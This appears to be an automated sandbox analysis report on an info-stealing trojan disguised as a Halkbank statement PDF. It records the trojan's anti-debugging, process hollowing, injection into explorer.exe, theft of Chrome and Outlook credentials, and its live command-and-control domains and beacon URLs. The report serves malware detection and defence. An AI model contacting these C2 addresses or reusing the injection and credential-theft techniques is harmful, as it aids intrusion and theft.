          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h]3_2_00ADC577
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h]3_2_00ADC577
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF3D43 mov eax, dword ptr fs:[00000030h]3_2_00AF3D43
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B33540 mov eax, dword ptr fs:[00000030h]3_2_00B33540
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B63D40 mov eax, dword ptr fs:[00000030h]3_2_00B63D40
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AD7D50 mov eax, dword ptr fs:[00000030h]3_2_00AD7D50
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B346A7 mov eax, dword ptr fs:[00000030h]3_2_00B346A7
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]3_2_00B80EA5
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]3_2_00B80EA5
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h]3_2_00B80EA5
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B4FE87 mov eax, dword ptr fs:[00000030h]3_2_00B4FE87
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE16E0 mov ecx, dword ptr fs:[00000030h]3_2_00AE16E0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC76E2 mov eax, dword ptr fs:[00000030h]3_2_00AC76E2
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE36CC mov eax, dword ptr fs:[00000030h]3_2_00AE36CC
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF8EC7 mov eax, dword ptr fs:[00000030h]3_2_00AF8EC7
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B88ED6 mov eax, dword ptr fs:[00000030h]3_2_00B88ED6
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B6FEC0 mov eax, dword ptr fs:[00000030h]3_2_00B6FEC0
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B6FE3F mov eax, dword ptr fs:[00000030h]3_2_00B6FE3F
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABE620 mov eax, dword ptr fs:[00000030h]3_2_00ABE620
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h]3_2_00ABC600
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AE8E00 mov eax, dword ptr fs:[00000030h]3_2_00AE8E00
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]3_2_00AEA61C
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h]3_2_00AEA61C
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B71608 mov eax, dword ptr fs:[00000030h]3_2_00B71608
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC766D mov eax, dword ptr fs:[00000030h]3_2_00AC766D
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h]3_2_00ADAE73
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h]3_2_00AC7E41
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]3_2_00B7AE44
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h]3_2_00B7AE44
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h]3_2_00B37794
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AC8794 mov eax, dword ptr fs:[00000030h]3_2_00AC8794
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AF37F5 mov eax, dword ptr fs:[00000030h]3_2_00AF37F5
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB4F2E mov eax, dword ptr fs:[00000030h]3_2_00AB4F2E
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AB4F2E mov eax, dword ptr fs:[00000030h]3_2_00AB4F2E
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AEE730 mov eax, dword ptr fs:[00000030h]3_2_00AEE730
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AEA70E mov eax, dword ptr fs:[00000030h]3_2_00AEA70E
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00AEA70E mov eax, dword ptr fs:[00000030h]3_2_00AEA70E
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B4FF10 mov eax, dword ptr fs:[00000030h]3_2_00B4FF10
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B4FF10 mov eax, dword ptr fs:[00000030h]3_2_00B4FF10
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B8070D mov eax, dword ptr fs:[00000030h]3_2_00B8070D
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B8070D mov eax, dword ptr fs:[00000030h]3_2_00B8070D
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ADF716 mov eax, dword ptr fs:[00000030h]3_2_00ADF716
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ACFF60 mov eax, dword ptr fs:[00000030h]3_2_00ACFF60
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00B88F6A mov eax, dword ptr fs:[00000030h]3_2_00B88F6A
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_00ACEF40 mov eax, dword ptr fs:[00000030h]3_2_00ACEF40
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 3_2_0040CF23 LdrLoadDll,3_2_0040CF23
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 1_2_00401E36 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00401E36
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 1_2_00403FFA SetUnhandledExceptionFilter,1_2_00403FFA
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 1_2_00402B91 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00402B91

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.8.96 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 194.102.227.30 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.91 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cutgang.net
          Source: C:\Windows\explorer.exeDomain query: www.energybig.xyz
          Source: C:\Windows\explorer.exeDomain query: www.wenzid4.top
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: 20000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeProcess created: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeJump to behavior
          Source: explorer.exe, 00000004.00000002.576564727.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.581514296.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.334544991.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.576564727.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.334544991.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000004.00000002.576564727.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.334544991.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.576564727.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.334544991.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000002.576238751.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.332767544.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeCode function: 1_2_00404C06 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_00404C06
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 3.2.jmaxbgpy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.jmaxbgpy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.576616910.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.576194364.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.576555861.00000000028D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.374817426.0000000000470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.374851183.00000000004A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\systray.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 3.2.jmaxbgpy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.jmaxbgpy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.576616910.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.576194364.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.576555861.00000000028D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.374817426.0000000000470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.374851183.00000000004A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts12
          Native API
          Path Interception1
          Access Token Manipulation
          1
          Deobfuscate/Decode Files or Information
          1
          OS Credential Dumping
          1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium3
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules
          Boot or Logon Initialization Scripts512
          Process Injection
          2
          Obfuscated Files or Information
          LSASS Memory2
          File and Directory Discovery
          Remote Desktop Protocol1
          Data from Local System
          Exfiltration Over Bluetooth1
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts2
          Command and Scripting Interpreter
          Logon Script (Windows)Logon Script (Windows)11
          Software Packing
          Security Account Manager6
          System Information Discovery
          SMB/Windows Admin Shares1
          Email Collection
          Automated Exfiltration4
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
          Virtualization/Sandbox Evasion
          NTDS141
          Security Software Discovery
          Distributed Component Object Model1
          Clipboard Data
          Scheduled Transfer14
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Access Token Manipulation
          LSA Secrets2
          Virtualization/Sandbox Evasion
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common512
          Process Injection
          Cached Domain Credentials2
          Process Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          Remote System Discovery
          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 813159 Sample: Halkbank_Ekstre_20191102_07... Startdate: 22/02/2023 Architecture: WINDOWS Score: 100 31 www.genuineinsights.cloud 2->31 51 Snort IDS alert for network traffic 2->51 53 Multi AV Scanner detection for domain / URL 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 4 other signatures 2->57 10 Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe 19 2->10         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\jmaxbgpy.exe, PE32 10->29 dropped 13 jmaxbgpy.exe 1 10->13         started        process6 signatures7 71 Multi AV Scanner detection for dropped file 13->71 73 Detected unpacking (changes PE section rights) 13->73 75 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 13->75 77 Maps a DLL or memory area into another process 13->77 16 jmaxbgpy.exe 13->16         started        19 conhost.exe 13->19         started        process8 signatures9 43 Modifies the context of a thread in another process (thread injection) 16->43 45 Maps a DLL or memory area into another process 16->45 47 Sample uses process hollowing technique 16->47 49 Queues an APC in another process (thread injection) 16->49 21 explorer.exe 2 1 16->21 injected process10 dnsIp11 33 www.energybig.xyz 184.94.215.91, 49719, 49720, 80 VXCHNGE-NC01US United States 21->33 35 cutgang.net 194.102.227.30, 80 VODAFONE_ROCharlesdeGaullenr15RO Romania 21->35 37 2 other IPs or domains 21->37 59 System process connects to network (likely due to code injection or exploit) 21->59 61 Performs DNS queries to domains with low reputation 21->61 25 systray.exe 13 21->25         started        signatures12 process13 dnsIp14 39 www.cutgang.net 25->39 41 cutgang.net 25->41 63 Tries to steal Mail credentials (via file / registry access) 25->63 65 Tries to harvest and steal browser information (history, passwords, etc) 25->65 67 Modifies the context of a thread in another process (thread injection) 25->67 69 Maps a DLL or memory area into another process 25->69 signatures15

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe41%VirustotalBrowse
          Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe33%ReversingLabsWin32.Trojan.Nsisx
          Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe23%ReversingLabsWin32.Trojan.Pwsx
          SourceDetectionScannerLabelLinkDownload
          1.2.jmaxbgpy.exe.8c0000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.jmaxbgpy.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          SourceDetectionScannerLabelLink
          www.energybig.xyz8%VirustotalBrowse
          www.wenzid4.top1%VirustotalBrowse
          SourceDetectionScannerLabelLink
          http://www.cutgang.net/ghii/0%Avira URL Cloudsafe
          http://www.fluxgreenn.space0%Avira URL Cloudsafe
          http://www.yeah-go.com/ghii/0%Avira URL Cloudsafe
          http://www.cutgang.net/ghii/?Azs=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgfqw8h0%Avira URL Cloudsafe
          http://www.sem-jobs.com0%Avira URL Cloudsafe
          http://www.sem-jobs.com/ghii/0%Avira URL Cloudsafe
          http://www.bemmulher.online0%Avira URL Cloudsafe
          http://www.energybig.xyz/ghii/?Azs=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gh4V4lR0M0OxnEw==&OGpK-=bVTY_sdT7100%Avira URL Cloudmalware
          http://www.de-nagel.com/ghii/0%Avira URL Cloudsafe
          http://www.cutgang.net0%Avira URL Cloudsafe
          http://www.ixirwholesale.xyz/ghii/0%Avira URL Cloudsafe
          http://www.7dkjhk.com/ghii/100%Avira URL Cloudmalware
          http://www.genuineinsights.cloud/ghii/100%Avira URL Cloudmalware
          http://www.energybig.xyz100%Avira URL Cloudmalware
          http://www.ladybillplanet.com/ghii/100%Avira URL Cloudmalware
          http://www.hubyazilim.com/ghii/100%Avira URL Cloudmalware
          http://www.octohoki.net/ghii/100%Avira URL Cloudmalware
          http://www.nortonseecurity.com/ghii/0%Avira URL Cloudsafe
          http://www.octohoki.net100%Avira URL Cloudmalware
          http://www.assilajamiart.com/ghii/0%Avira URL Cloudsafe
          http://www.genuineinsights.cloud100%Avira URL Cloudphishing
          http://www.de-nagel.com0%Avira URL Cloudsafe
          http://www.ladybillplanet.com0%Avira URL Cloudsafe
          http://www.wenzid4.top/ghii/100%Avira URL Cloudmalware
          http://www.energybig.xyz/ghii/100%Avira URL Cloudmalware
          http://www.7dkjhk.com0%Avira URL Cloudsafe
          http://www.wenzid4.top0%Avira URL Cloudsafe
          http://www.wenzid4.top/ghii/?Azs=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3LCH1xNv1NtM5EA==&OGpK-=bVTY_sdT7100%Avira URL Cloudmalware
          http://www.fluxgreenn.space/ghii/0%Avira URL Cloudsafe
          http://www.assilajamiart.com0%Avira URL Cloudsafe
          http://www.yeah-go.com0%Avira URL Cloudsafe
          http://www.ixirwholesale.xyz0%Avira URL Cloudsafe
          http://www.bemmulher.online/ghii/0%Avira URL Cloudsafe
          http://www.nortonseecurity.com0%Avira URL Cloudsafe
          http://www.hubyazilim.com0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.genuineinsights.cloud
          66.96.162.149
          truefalse
            unknown
            cutgang.net
            194.102.227.30
            truetrue
              unknown
              www.energybig.xyz
              184.94.215.91
              truetrueunknown
              www.wenzid4.top
              107.148.8.96
              truetrueunknown
              www.cutgang.net
              unknown
              unknowntrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                http://www.energybig.xyz/ghii/?Azs=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gh4V4lR0M0OxnEw==&OGpK-=bVTY_sdT7true
                • Avira URL Cloud: malware
                unknown
                http://www.energybig.xyz/ghii/true
                • Avira URL Cloud: malware
                unknown
                http://www.wenzid4.top/ghii/?Azs=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3LCH1xNv1NtM5EA==&OGpK-=bVTY_sdT7true
                • Avira URL Cloud: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.fluxgreenn.spaceexplorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.332767544.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.576238751.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://www.bemmulher.onlineexplorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://duckduckgo.com/chrome_newtabsystray.exe, 00000005.00000002.576305318.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drfalse
                    high
                    http://www.cutgang.net/ghii/explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://duckduckgo.com/ac/?q=-912K03JO.5.drfalse
                      high
                      http://www.cutgang.net/ghii/?Azs=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgfqw8hsystray.exe, 00000005.00000002.578396952.0000000006FB1000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.hubyazilim.com/ghii/explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icosystray.exe, 00000005.00000002.576305318.00000000003E2000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.5.drfalse
                        high
                        http://www.7dkjhk.com/ghii/explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        unknown
                        https://duckduckgo.com/?q=systray.exe, 00000005.00000002.576305318.00000000003E2000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://www.octohoki.net/ghii/explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          unknown
                          http://www.sem-jobs.comexplorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
